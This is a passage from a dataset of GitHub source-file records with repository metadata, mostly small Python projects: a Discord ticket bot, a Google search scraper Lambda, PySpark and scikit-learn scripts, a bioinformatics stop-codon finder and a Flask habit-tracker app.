'Block?')\n self.drawText(5, 50, '* | NO')\n self.drawText(80, 50, '# | YES')\n self.disp.image(self.image)\n self.disp.display()\n\n def confirmBlock(self, keyPad, pn532):\n while True:\n self.newImage()\n pkey = keyPad.pressed_keys\n if pkey:\n time.sleep(0.5)\n if pkey[0] == '#':\n if SecureCard(pn532):\n self.drawText(45, 30, 'DONE')\n self.disp.image(self.image)\n self.Display()\n break\n elif pkey[0] == '*':\n self.drawText(45, 30, 'CANCELLED')\n self.disp.image(self.image)\n self.Display()\n break\n else:\n continue\n return\n\nclass BlockModeWindow(BaseWindow):\n\n def __init__(self, disp, pn532, keypad):\n self.pn532 = pn532\n self.keypad = keypad\n super().__init__(disp)\n\n def show(self, pn532):\n self.drawText(10, 30, 'Waiting for card...')\n self.Display()\n cardId = WriteCard(pn532)\n if cardId:\n self.newImage()\n self.drawText(10, 30, 'DONE')\n self.Display()\n sw = SecureWindow(self.disp)\n time.sleep(3)\n sw.show(cardId)\n sw.confirmBlock(self.keypad, self.pn532)\n else:\n raise\n\nclass DisplayError(BaseWindow):\n\n def __init__(self, disp, result):\n self.result = result\n super().__init__(disp)\n\n def show(self):\n self.draw.text((10, 30), self.result, font=self.font, fill=255)\n self.disp.image(self.image)\n self.disp.display()\n\n\n","repo_name":"anti-social-engineers/AceCardRaspPi","sub_path":"PL/Windows.py","file_name":"Windows.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3409464183","text":"import discord\nimport cancel\nimport reserve\nimport pickledb\n\n\ndef split(word):\n return [char for char in word]\n\nclass completeButton(discord.ui.View):\n @discord.ui.button(style = discord.ButtonStyle.grey, label=\"Unreserve\")\n async def click_me_button(self, interaction: discord.Interaction, button: discord.ui.Button):\n db = pickledb.load('logiTicket.json', True)\n await interaction.response.defer() \n embedVar = interaction.message.embeds[0]\n embedVar.set_footer(text=\"All completion of tickets works on an honesty policy, please do not abuse the system\")\n msg = interaction.message\n ticketnum = int(embedVar.title.split(\" #\")[1].split(\":\")[0])\n dbContent = db.get(str(ticketnum)).split(\"//\")\n if dbContent[5] == str(interaction.user.id):\n del dbContent[5]\n dbContentConc=\"\"\n for i in range(len(dbContent)):\n dbContentConc = dbContentConc+dbContent[i]+\"//\"\n dbContentConc = dbContentConc+\"%<><>!\"\n db.set(str(ticketnum), dbContentConc.replace(\"//%<><>!\",\"\"))\n await msg.edit(embed=embedVar, view=reserve.reserveButton())\n \n @discord.ui.button(style = discord.ButtonStyle.green, label='Complete')\n async def click_me_button_2(self, interaction: discord.Interaction, button: discord.ui.Button):\n db = pickledb.load('logiTicket.json', True)\n ticketnum = int(interaction.message.embeds[0].title.split(\" #\")[1].split(\":\")[0])\n if str(interaction.user.id)==db.get(str(ticketnum)).split(\"//\")[5]:\n channel = interaction.channel\n message = \"<@\"+str(db.get(str(ticketnum)).split(\"//\")[0])+\"> ```Your Order (#\"+str(ticketnum)+\") was completed by: \"+interaction.user.display_name+\"```\"\n await channel.send(message)\n leaderboard = db.get(\"lb\")\n lb = leaderboard.split(\"//\")\n del lb[0]\n leaderboard=\"//\"\n x=0\n for i in range(len(lb)):\n if lb[i][0:18] == str(db.get(str(ticketnum)).split(\"//\")[5]):\n lbSplit=split(lb[i])\n score=\"\"\n for z in range(18, len(lbSplit)):\n score=score+lbSplit[z]\n score=str(int(score)+1)\n lbConc=\"\"\n for k in range(len(lbSplit)-len(split(score))):\n lbConc=lbConc+lbSplit[k]\n lbConc+=score\n lb[i]=lbConc\n print(lb[i])\n for i in range(len(lb)):\n leaderboard = leaderboard+lb[i]+\"//\"\n db.set(\"lb\", leaderboard.replace(\"////\",\"//\"))\n break\n else:\n x+=1\n if x == len(lb):\n db.set(\"lb\", db.get(\"lb\")+str(db.get(str(ticketnum)).split(\"//\")[5])+\"1//\")\n db.rem(str(ticketnum)) \n await interaction.message.delete()\n \n\n @discord.ui.button(style = discord.ButtonStyle.red, label='Cancel')\n async def click_me_button_3(self, interaction: discord.Interaction, button: discord.ui.Button):\n await cancel.interactionCancel(interaction) ","repo_name":"josh56432/LogiTicketRevamp2","sub_path":"complete.py","file_name":"complete.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22795648580","text":"#%%\nfrom pyspark.sql import SparkSession\nspark = SparkSession.builder.appName(\"VectorSizeHint\").master(\"local[*]\").getOrCreate()\nfrom pyspark.ml.linalg import Vectors\ndf = spark.createDataFrame([\n (Vectors.dense([-2.0, 2.3, 0.0, 0.0, 1.0]),),\n (Vectors.dense([0.0, 0.0, 0.0, 0.0, 0.0]),),\n (Vectors.dense([0.6, -1.1, -3.0, 4.5, 3.3]),)], [\"features\"])\n#%%\ndf.head(3)\n#%%\nfrom pyspark.ml.feature import VectorSlicer\nvs = VectorSlicer(inputCol=\"features\", outputCol=\"sliced\", indices=[1, 4])\nvs.transform(df).head(3)\n#%%\nspark.stop()","repo_name":"Gadaite/Pyspark-ML-Kafka-Hadoop-","sub_path":"pyspark_ML/Feature_engineering/VectorSlicer_.py","file_name":"VectorSlicer_.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"34339549457","text":"import csv\nfrom dbfpy import dbf\nimport os\nimport xlrd\nimport glob\n\npath = \"/home/pwm4/Desktop/cg342/cleaned_raw_comparison/PVT/redo/clean/cleaned_data/dbf/\"\ncsv_path = \"/home/pwm4/Desktop/cg342/cleaned_raw_comparison/PVT/redo/clean/cleaned_data/dbf_csv/\"\n\nallfiles = glob.glob(path + \"*.DBF\")\n\nfor filepath in allfiles:\n## print(filepath)\n# \n filename = os.path.basename(os.path.splitext(filepath)[0])\n## print filename\n csv_file_name = csv_path + filename+ \".csv\"\n# print csv_file_name\n with open(csv_file_name,'wb') as csvfile:\n in_db = dbf.Dbf(filepath)\n out_csv = csv.writer(csvfile)\n names = []\n for field in in_db.header.fields:\n names.append(field.name)\n out_csv.writerow(names)\n for rec in in_db:\n out_csv.writerow(rec.fieldData)\n print(filename)\n in_db.close()\n\n###################\n#mainpath = r\"/home/pwm4/Desktop/cg342/cleaned_raw_comparison/KSS/KSS_cleaned/KSS_cleaned_data/DBF/\"\n#csv_path = r\"/home/pwm4/Desktop/cg342/cleaned_raw_comparison/KSS/KSS_cleaned/KSS_cleaned_csv/\"\n\n#for dirpath, dirnames, filenames in os.walk(mainpath):\n# \n# for filename in filenames:\n## print(\"filename \", filename)\n# if filename.endswith('.DBF'):\n# filepath = mainpath + filename\n# name_stripped = os.path.basename(os.path.splitext(filepath)[0])\n# file_to_write = csv_path + name_stripped + \".csv\"\n# with open(file_to_write,'wb') as csvfile:\n## print(filepath)\n## print(\"csvpath is: \\n\" + file_to_write) \n# print(\"filepath is .....\", filepath)\n# in_db = dbf.Dbf(filepath)\n## \n## out_csv = csv.writer(csvfile)\n## names = []\n## for field in in_db.header.fields:\n## names.append(field.name)\n## out_csv.writerow(names)\n## for rec in in_db:\n## out_csv.writerow(rec.fieldData)\n## in_db.close()\n## print(\"done\")\n\n","repo_name":"cg342/merge_cleaned_PVT","sub_path":"4_dbf_to_csv.py","file_name":"4_dbf_to_csv.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71356796094","text":"#-*- coding: utf-8 -*-\n\n'''\n4. Implementar um módulo com duas funções:\n ▪ split(fn, n), que quebra o arquivo fn em partes de n bytes e salva com\n nomes sequenciais (se fn = arq.txt, então arq_001.txt, arq_002.txt, ... )\n ▪ join(fn, fnlist) que junte os arquivos da lista fnlist em um arquivo só fn.\n'''\n\nfrom os.path import getsize\n\ndef join(fn, fnlist):\n file_out = open(fn, 'w')\n for filename in fnlist:\n file_in = open(filename, 'r')\n for line in file_in:\n file_out.write(line)\n file_in.close()\n file_out.close()\n\ndef split(fn, n):\n #depois olhar como criar exceção em python e se é possível para lançar uma\n #isso também surgiu na refatoração e está tarde!!!\n if n > getsize(fn):\n return #exceção?\n file_in = open(fn, 'r')\n file_counter = 0\n #lê n bytes do arquivo e seta o ponteiro de leitura onde ele termina a leitura\n n_bytes_string = file_in.read(n)\n while n_bytes_string != '':\n file_counter += 1\n file_out = open(fn[:-4] + '_%03d.txt' %file_counter, 'w')\n file_out.write(n_bytes_string)\n file_out.close()\n n_bytes_string = file_in.read(n)\n file_in.close()\n\nif __name__ == '__main__':\n join('arq_do_join.txt', ['arq_exerc_01.txt', 'arq_exerc_03.txt'])\n split('arq_grande.txt', 30)\n","repo_name":"berinhard/forkinrio_exercises","sub_path":"exercicios/parte_2/parte_2_4.py","file_name":"parte_2_4.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"2901559899","text":"#!/usr/bin/env python3\n\nimport unittest\n\nfrom notify_engine import (\n NotifyManager, EventLoopInterface, CommonEvent, EventInterface,\n)\n\nfrom notify_engine.notify_manager.events import (\n CommonEventSerialize, CommonPublishOpts,\n)\n\n\nclass myEvent(EventInterface, CommonEventSerialize, CommonPublishOpts):\n def __init__(self, message=None, additional=None):\n self.message = message\n self.additional = additional\n\n @staticmethod\n def event_type():\n return 'myEvent'\n\n\nclass EventLoop(EventLoopInterface):\n def __init__(self):\n self.subscribers = set()\n self.messages = list()\n\n def subscribe(self, handle):\n self.subscribers.add(handle)\n\n def publish(self, message):\n self.messages.append(message)\n\n def stop(self):\n return\n\n def _pop_message(self):\n while self.messages:\n m = self.messages.pop()\n yield m\n\n def run(self):\n for message in self._pop_message():\n for subscriber in self.subscribers:\n subscriber(message)\n\n\nclass TestNotifyManager(unittest.TestCase):\n def test_notify_manager(self):\n '''Test nofity manager subscribe/publish'''\n evl = EventLoop()\n nm = NotifyManager(evl, lambda task, event: task(event))\n\n test_message = 'test message 0081'\n additional_message = 'additional message 9240'\n\n ok = {\n 'called_common': False,\n 'called_my': False,\n }\n\n def task_common_handler(event):\n ok['called_common'] = True\n self.assertEqual(event.message, test_message)\n\n def task_my_handler(event):\n ok['called_my'] = True\n self.assertEqual(event.message, test_message)\n self.assertEqual(event.additional, additional_message)\n\n nm.publish(CommonEvent(test_message))\n nm.subscribe(CommonEvent, task_common_handler)\n nm.subscribe(myEvent, task_my_handler)\n\n nm.run()\n self.assertTrue(ok['called_common'])\n self.assertFalse(ok['called_my'])\n\n ok['called_common'] = False\n nm.run()\n self.assertFalse(ok['called_common'])\n self.assertFalse(ok['called_my'])\n \n nm.publish(myEvent(test_message, additional_message))\n nm.run()\n self.assertFalse(ok['called_common'])\n self.assertTrue(ok['called_my'])\n \n ok['called_my'] = False\n nm.publish(CommonEvent(test_message))\n nm.publish(myEvent(test_message, additional_message))\n nm.run()\n self.assertTrue(ok['called_common'])\n self.assertTrue(ok['called_my'])\n\n \nif __name__ == '__main__':\n unittest.main()\n","repo_name":"kloliks/notify_engine","sub_path":"tests/test_notify_manager.py","file_name":"test_notify_manager.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5123693486","text":"import json\nimport re\nfrom random import shuffle\n\nfrom botocore.vendored import requests\n\n\ndef crawl(search_term='Drake'):\n INFO_REGEX = rb'\\s*([^<]+)'\n URL = \"https://www.google.ro/search?q={}\".format(search_term)\n\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n }\n\n response = requests.get(URL, headers=headers)\n response_content = response.content\n output = []\n results = re.findall(INFO_REGEX, response_content)\n if results:\n for result in results:\n output.append({\n \"url\": result[0].decode(\"utf-8\"),\n \"snippet\": result[1].decode(\"utf-8\"),\n })\n first_results = output[:5]\n other_results = output[5:]\n shuffle(other_results)\n\n return first_results + other_results\n\n\ndef lambda_handler(event, context):\n return {\n 'statusCode': 200,\n 'headers': {'Content-Type': 'application/json'},\n # 'body': json.dumps(event['queryStringParameters'])\n 'body': json.dumps(crawl(event['queryStringParameters']['query']))\n }\n","repo_name":"lupusilviu95/Gingo","sub_path":"aws/lamzi/google/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14820826156","text":"from enum import Enum\nfrom enum import unique\n\n\n@unique\nclass TokenType(Enum):\n OpenBrace = \"{\"\n CloseBrace = \"}\"\n StringLiteral = \"StringLiteral\"\n COLON = \":\"\n QUOTE = '\"'\n NUMBER = \"NUMBER\"\n COMMA = \",\"\n NIL = \"NIL\"\n EOF = \"EOF\"\n TRUE = \"true\"\n FALSE = 'false'\n\n\n# @unique\n# class KeyWorks(Enum):\n# true = TokenType.TRUE\n# false = TokenType.FALSE\n\n\nclass Token:\n def __init__(self, jtype, value):\n \"\"\"\n :param jtype:\n :param value:\n \"\"\"\n self.jtype = jtype\n self.value = value\n","repo_name":"EurusEurus/json-parser","sub_path":"mode1/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32819516628","text":"import pandas as pd\nimport numpy as np\n\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.svm import SVC\n\nfrom sklearn.model_selection import train_test_split, GridSearchCV\n\nfrom sklearn.metrics import classification_report, accuracy_score\n\ndef read_train(file_name='../input/train.csv'):\n print('Reading in training set...')\n train_df = pd.read_csv(file_name)\n print('Training set dimensionality: (%i, %i).\\n' % train_df.shape)\n\n return train_df\n\ndef read_test(file_name='../input/'):\n print('Reading in testing set...')\n test_df = pd.read_csv('input/test.csv')\n print('Testing set dimensionality: (%i, %i).\\n' % test_df.shape)\n\n return test_df\n\nprint('Performing SVC prediction...')\nprint('Training...')\n\ndef param_select(X, y):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=13)\n print('Training set shape:', X_train.shape, y_train.shape)\n print('Testing set shape:', X_test.shape, y_test.shape)\n\n parameters = {\n 'kernel': ['linear'],\n 'C': [20, 1, 0.5]\n }\n\n print('Tuning hyper-parameters...')\n selector = GridSearchCV(SVC(), parameters, scoring='accuracy')\n selector.fit(X_train, y_train)\n\n print('Best parameter set found on development set:')\n print(selector.best_params_)\n print('Grid scores on development set:')\n means = selector.cv_results_['mean_test_score']\n stds = selector.cv_results_['std_test_score']\n for mean, std, params in zip(means, stds, selector.cv_results_['params']):\n print('%0.3f (+/-%0.03f) for %r' % (mean, std * 2, params))\n print()\n\n print('Detailed classification report:')\n print(\"The model is trained on the full development set.\")\n print(\"The scores are computed on the full evaluation set.\")\n y_true = y_test\n y_pred = selector.predict(X_test)\n print(classification_report(y_true, y_pred))\n\ndef predict(clf):\n test_df = read_test()\n X_test, y_test = test_df.iloc[:, 0:len(test_df.columns) -1], test_df.iloc[:, -1]\n\n print('Predicting...')\n y_pred = clf.predict(X_test)\n print('Accuracy score:', accuracy_score(y_test, y_pred))\n\nif __name__ == '__main__':\n train_df = read_train()\n X, y = train_df.iloc[:, 0:len(train_df.columns) - 1], train_df.iloc[:, -1]\n\n param_select(X, y)\n\n #clf = SVC(kernel='linear', C=1).fit(X, y)\n #predict(clf)\n","repo_name":"vijji0555/Activity-Recognition","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9668682520","text":"import sys\n\nimport airfoil\n\nif len(sys.argv) < 2:\n print('Usage:')\n print(' python3 {} '.format(sys.argv[0]))\n sys.exit(0)\n\ninputdir = sys.argv[1]\n\ntry:\n a = airfoil.Airfoil(inputdir)\nexcept RuntimeError as e:\n print('ERROR: {}'.format(e))\n sys.exit(2)\n\nprint(a)\n","repo_name":"chechaohp/researchdeep","sub_path":"courses/cme211/cme211-jongminyoon/hw3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"14673473250","text":"# server.py\n\nimport eventlet\nimport socketio\n\nsio = socketio.Server()\napp = socketio.WSGIApp(sio)\n\n\n@sio.on('connect')\ndef connect(sid, environ):\n print('new client connected ', sid)\n\n\n@sio.on('message')\ndef message(sid, message):\n print('new message ', message)\n sio.emit(\"message\", message)\n\n\n@sio.on('disconnect')\ndef disconnect(sid):\n print('client disconnect ', sid)\n\nif __name__ == '__main__':\n eventlet.wsgi.server(eventlet.listen(('', 5000)), app)\n","repo_name":"SultanKs4/kuliah","sub_path":"Python/Project using virtualenv/web socket/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74340270336","text":"def get_context(lineno, context_line, pre_context=None, post_context=None):\n if lineno is None:\n return []\n\n if context_line is None and not (pre_context or post_context):\n return []\n\n lineno = int(lineno)\n context = []\n start_lineno = lineno - len(pre_context or [])\n if pre_context:\n start_lineno = lineno - len(pre_context)\n at_lineno = start_lineno\n for line in pre_context:\n context.append([at_lineno, line])\n at_lineno += 1\n else:\n start_lineno = lineno\n at_lineno = lineno\n\n if start_lineno < 0:\n start_lineno = 0\n\n context.append([at_lineno, context_line])\n at_lineno += 1\n\n if post_context:\n for line in post_context:\n context.append([at_lineno, line])\n at_lineno += 1\n\n return context\n","repo_name":"diwaperkasa/glitchtip","sub_path":"code/sentry/interfaces/stacktrace.py","file_name":"stacktrace.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6142980382","text":"\n\ndef allindices(string, sub, offset=0):\n listindex=[]\n i = string.find(sub, offset)\n while i >= 0:\n listindex.append(i)\n i = string.find(sub, i + 1)\n return listindex\n \n\ndef findTranscriptsWithSTOPCodonsIn5PrimeUTRSequence(options,gene_info):\n \"\"\"\n Finds transcripts with STOP codons in 5' UTR sequences\n \"\"\"\n transcripts_to_in_frame_STOP_codon_locations_in_5_prime_UTR_region={}\n fhr=open(options.transcriptome,\"r\")\n for line in fhr:\n if \">\" in line:\n transcript_id=line.strip().split()[0][1:]\n if transcript_id not in gene_info:continue\n #start,end=int(line.strip().split(\"CDS=\")[-1].split(\"-\")[0]),int(line.strip().split(\"CDS=\")[-1].split(\"-\")[-1])\n start,end=gene_info[transcript_id][\"cds_start\"],gene_info[transcript_id][\"cds_end\"]\n seq=fhr.readline().strip()\n five_prime_UTR_region=seq[:start-1]\n if len(five_prime_UTR_region) % 3 == 1:\n five_prime_UTR_region=five_prime_UTR_region[1:]\n dropped=1\n elif len(five_prime_UTR_region) % 3 == 2:\n five_prime_UTR_region=five_prime_UTR_region[2:]\n dropped=2\n else:\n dropped=0\n locations_of_TAA=allindices(five_prime_UTR_region,\"TAA\")\n locations_of_TAG=allindices(five_prime_UTR_region,\"TAG\")\n locations_of_TGA=allindices(five_prime_UTR_region,\"TGA\")\n locations_of_TAA_in_frame_with_CDS_check=[x%3 for x in locations_of_TAA]\n locations_of_TAG_in_frame_with_CDS_check=[x%3 for x in locations_of_TAG]\n locations_of_TGA_in_frame_with_CDS_check=[x%3 for x in locations_of_TGA]\n if dropped==1:\n locations_of_TAA_in_frame_with_CDS=[loc+1+1 for num,loc in enumerate(locations_of_TAA) if locations_of_TAA_in_frame_with_CDS_check[num]==0]\n locations_of_TAG_in_frame_with_CDS=[loc+1+1 for num,loc in enumerate(locations_of_TAG) if locations_of_TAG_in_frame_with_CDS_check[num]==0]\n locations_of_TGA_in_frame_with_CDS=[loc+1+1 for num,loc in enumerate(locations_of_TGA) if locations_of_TGA_in_frame_with_CDS_check[num]==0]\n elif dropped==2:\n locations_of_TAA_in_frame_with_CDS=[loc+2+1 for num,loc in enumerate(locations_of_TAA) if locations_of_TAA_in_frame_with_CDS_check[num]==0]\n locations_of_TAG_in_frame_with_CDS=[loc+2+1 for num,loc in enumerate(locations_of_TAG) if locations_of_TAG_in_frame_with_CDS_check[num]==0]\n locations_of_TGA_in_frame_with_CDS=[loc+2+1 for num,loc in enumerate(locations_of_TGA) if locations_of_TGA_in_frame_with_CDS_check[num]==0]\n else:\n locations_of_TAA_in_frame_with_CDS=[loc+1 for num,loc in enumerate(locations_of_TAA) if locations_of_TAA_in_frame_with_CDS_check[num]==0]\n locations_of_TAG_in_frame_with_CDS=[loc+1 for num,loc in enumerate(locations_of_TAG) if locations_of_TAG_in_frame_with_CDS_check[num]==0]\n locations_of_TGA_in_frame_with_CDS=[loc+1 for num,loc in enumerate(locations_of_TGA) if locations_of_TGA_in_frame_with_CDS_check[num]==0]\n all_locations=[]\n all_locations.extend(locations_of_TAA_in_frame_with_CDS)\n all_locations.extend(locations_of_TAG_in_frame_with_CDS)\n all_locations.extend(locations_of_TGA_in_frame_with_CDS)\n transcripts_to_in_frame_STOP_codon_locations_in_5_prime_UTR_region[transcript_id]=sorted(all_locations)\n fhr.close()\n return transcripts_to_in_frame_STOP_codon_locations_in_5_prime_UTR_region","repo_name":"Wiselab2/NGPINT","sub_path":"scripts/detectTranscriptsWithSTOPCodonsIn5PrimeUTRSequence.py","file_name":"detectTranscriptsWithSTOPCodonsIn5PrimeUTRSequence.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"6954332804","text":"import json as json\n\n\nclass CreateRecipesMap():\n def __init__(self, inputFileName, outputFileName):\n self.inputFileName = inputFileName\n self.outputFileName = outputFileName\n\n def createMap(self):\n with open(self.inputFileName, \"r\") as read_file:\n data = json.load(read_file)\n\n\n\n recipes = {}\n for i in data:\n for j in i['results']:\n recipes[j[\"_id\"]] = j['_source']\n\n\n\n\n #escrever o ficheiro \n f = open(self.outputFileName, 'w')\n f.write(json.dumps(recipes))\n\n return","repo_name":"RodrigoFelixgithub/culinary-assistant","sub_path":"createRecipesMap.py","file_name":"createRecipesMap.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"75005073854","text":"from collections import deque\r\n\r\nadj_list = [[1], [4, 3], [1, 0],\r\n [6], [5], [7, 3], [7], [8], []]\r\nn = len(adj_list)\r\nin_degree = [1,2,0,2,1,1,1,2,1]\r\n\r\n\r\ndef tsort():\r\n result = [] #위상정렬 결과를 저장할 리스트\r\n queue = deque() \r\n\r\n #진입차수가 가장 적은 정점을 찾아 큐에 넣는다.\r\n for i in range(0, n):\r\n if in_degree[i] == 0:\r\n queue.append(i)\r\n \r\n #큐에서 정점을 하나 꺼낸다. 걔가 now!\r\n while queue:\r\n #정점하나 방문하기!\r\n now = queue.popleft()\r\n result.append(now) \r\n\r\n #현재 방문한 정점의 인접 리스트에 있는 각 정점의 진입차수를 1낮춘다.\r\n for i in adj_list[now]:\r\n in_degree[i] -= 1\r\n #낮추면서 진입차수가 0이되는 곳은 방문해야 하니 큐에 넣는다.\r\n if in_degree[i] == 0:\r\n queue.append(i)\r\n #이렇게 방문한 정점의 인접한 정점의 진입차수를 수정하며 \r\n #큐에 추가하는 작업이 끝나면\r\n #while의 다음 반복으로 넘어가서 다음 점을 방문하게 된다.\r\n \r\n print(result)\r\n\r\ntsort()","repo_name":"rudgh4493/ProblemSolving","sub_path":"0926/lecture/tsort2.py","file_name":"tsort2.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"19013788248","text":"import cv2\nimport usingCamera as mnSSDm\n\ncap = cv2.VideoCapture(0)\ncap.set(3,640)\ncap.set(4,480)\nmyModel = mnSSDm.mnSSD(\"ssd-mobilenet-v2\", 0.5)\nwhile True:\n\tsuccess, img = cap.read()\n\tobjects = myModel.detect(img, True)\n\n\tcv2.imshow(\"Image\", img)\n\tcv2.waitKey(1)\n","repo_name":"estelelenath/ProjectAsurada","sub_path":"Code/usingCamera/project_Test.py","file_name":"project_Test.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"38701632033","text":"import segmenter\nfrom iBlocs import *\n\nclass Module_ib(segmenter.Segmenter):\n def __init__(self, context):\n self._context = context\n\n def __call__(self, document):\n self.process(document)\n return document\n\n def process(self,document):\n # On recupere le contenu\n text = document.getContent()\n # On trouve les blocs et on recupere une liste de (level, begin, stop)\n listeBlocs = trouveBlocs(text)\n\n # Pour chaque bloc, on fait un segment,\n # sauf bloc 0 qui est en fait tout le doc\n for b in listeBlocs:\n if b[0] == 0:\n continue\n start = b[1]\n segmentLength = b[2] - b[1]\n document.addSegment(start,segmentLength)\n","repo_name":"divyaabc/pypometre","sub_path":"documentSegmenters/mod_ib.py","file_name":"mod_ib.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"28020551153","text":"from flask import Blueprint, render_template, request, flash, redirect, url_for\r\nfrom flask_login import login_required, current_user\r\nimport datetime\r\n\r\n\r\nviews = Blueprint('views', __name__)\r\n\r\n\r\n@views.route('/')\r\n@login_required\r\ndef home():\r\n from .models import Tracker\r\n from . import db\r\n user = current_user.id\r\n from .models import Tracker, Log\r\n tracker = db.session.query(Tracker).with_entities(\r\n Tracker.name, Tracker.id, Tracker.description).distinct().filter(Tracker.uid == user).all()\r\n logs = db.session.query(Log).with_entities(\r\n Log.id).distinct().filter(Log.uid == user).all()\r\n print(tracker)\r\n\r\n return render_template(\"home.html\", user=current_user, tracker=tracker, tracker_count=len(tracker), log_count=len(logs))\r\n\r\n\r\n@views.route('/add-tracker', methods=['GET', 'POST'])\r\n@login_required\r\ndef add_tracker():\r\n if request.method == \"GET\":\r\n from . import db\r\n from .models import Tracker\r\n user = current_user.id\r\n tracker = db.session.query(Tracker).with_entities(\r\n Tracker.name, Tracker.id, Tracker.description).distinct().filter(Tracker.uid == user).all()\r\n return render_template(\"addtracker.html\", user=current_user, tracker=tracker, tracker_count=len(tracker))\r\n if request.method == 'POST':\r\n name = request.form['name']\r\n type = request.form['Action']\r\n settings = request.form['settings']\r\n description = request.form['description']\r\n\r\n from .models import Tracker\r\n\r\n tracker = Tracker.query.filter_by(name=name).first()\r\n user = current_user.id\r\n\r\n if tracker and user == tracker.uid:\r\n flash('The tracker \"' + name + '\" already exists', category='error')\r\n return redirect(url_for('views.add_tracker'))\r\n else:\r\n from . import db\r\n tracker_info = Tracker(\r\n name=name, description=description, type=type, settings=settings, uid=user)\r\n db.session.add(tracker_info)\r\n db.session.commit()\r\n flash(name + ' Tracker Added', category='success')\r\n return redirect(url_for('views.home'))\r\n\r\n\r\n@views.route('/delete-tracker/', methods=['GET', 'POST'])\r\n@login_required\r\ndef delete_tracker(tid):\r\n from .models import Tracker\r\n tracker = Tracker.query.get(tid)\r\n from . import db\r\n db.session.delete(tracker)\r\n db.session.commit()\r\n flash(tracker.name + ' Tracker Removed Successfully.', category='success')\r\n return redirect(url_for('views.home'))\r\n\r\n\r\n@views.route(\"/trackerinfo/\", methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef trinfo(tid):\r\n if request.method == \"GET\":\r\n from .models import Tracker, Log\r\n logs = Log.query.filter(Log.tid == tid).all()\r\n tracker = Tracker.query.with_entities(\r\n Tracker.type, Tracker.name).filter(Tracker.id == tid).first()\r\n\r\n return render_template(\"trackerinfo.html\", tracker=tracker, user=current_user, logs=logs, tid=tid)\r\n\r\n\r\n@views.route('/edit-tracker/', methods=['GET', 'POST'])\r\n@login_required\r\ndef edit_tracker(tid):\r\n user = current_user.id\r\n from .models import Tracker\r\n tracker = Tracker.query.get(tid)\r\n\r\n from . import db\r\n trackers = db.session.query(Tracker).with_entities(\r\n Tracker.name, Tracker.id, Tracker.description).distinct().filter(Tracker.uid == user).all()\r\n if request.method == \"GET\":\r\n return render_template(\"edittracker.html\", user=current_user, tracker=tracker, tid=tid, trackers=trackers)\r\n\r\n if request.method == 'POST':\r\n type = request.form['Action']\r\n settings = request.form['settings']\r\n description = request.form['description']\r\n uid = current_user.id\r\n from . import db\r\n tracker.description = description\r\n tracker.type = type\r\n tracker.settings = settings\r\n db.session.commit()\r\n flash('Tracker Updated Successfully.', category='success')\r\n return redirect(url_for('views.home'))\r\n\r\n\r\n@views.route('/add-log/', methods=['GET', 'POST'])\r\n@login_required\r\ndef add_log(tid):\r\n from .models import Tracker, Log\r\n user = current_user.id\r\n tracker = Tracker.query.get(tid)\r\n logs = Log.query.filter(Log.tid == tid).all()\r\n import datetime\r\n now = datetime.datetime.now()\r\n options = []\r\n from . import db\r\n trackers = db.session.query(Tracker).with_entities(\r\n Tracker.name, Tracker.id, Tracker.description).distinct().filter(Tracker.uid == user).all()\r\n if tracker.type == \"multiple_choice\":\r\n option = tracker.settings\r\n options = option.split(',')\r\n\r\n if request.method == \"GET\":\r\n return render_template(\"addlog.html\", user=current_user, tracker=tracker, now=now, tid=tid, options=options, trackers=trackers, logs=logs)\r\n\r\n if request.method == 'POST':\r\n when = request.form['date']\r\n value = request.form['value']\r\n note = request.form['note']\r\n from . import db\r\n log_info = Log(timestamp=when, value=value, 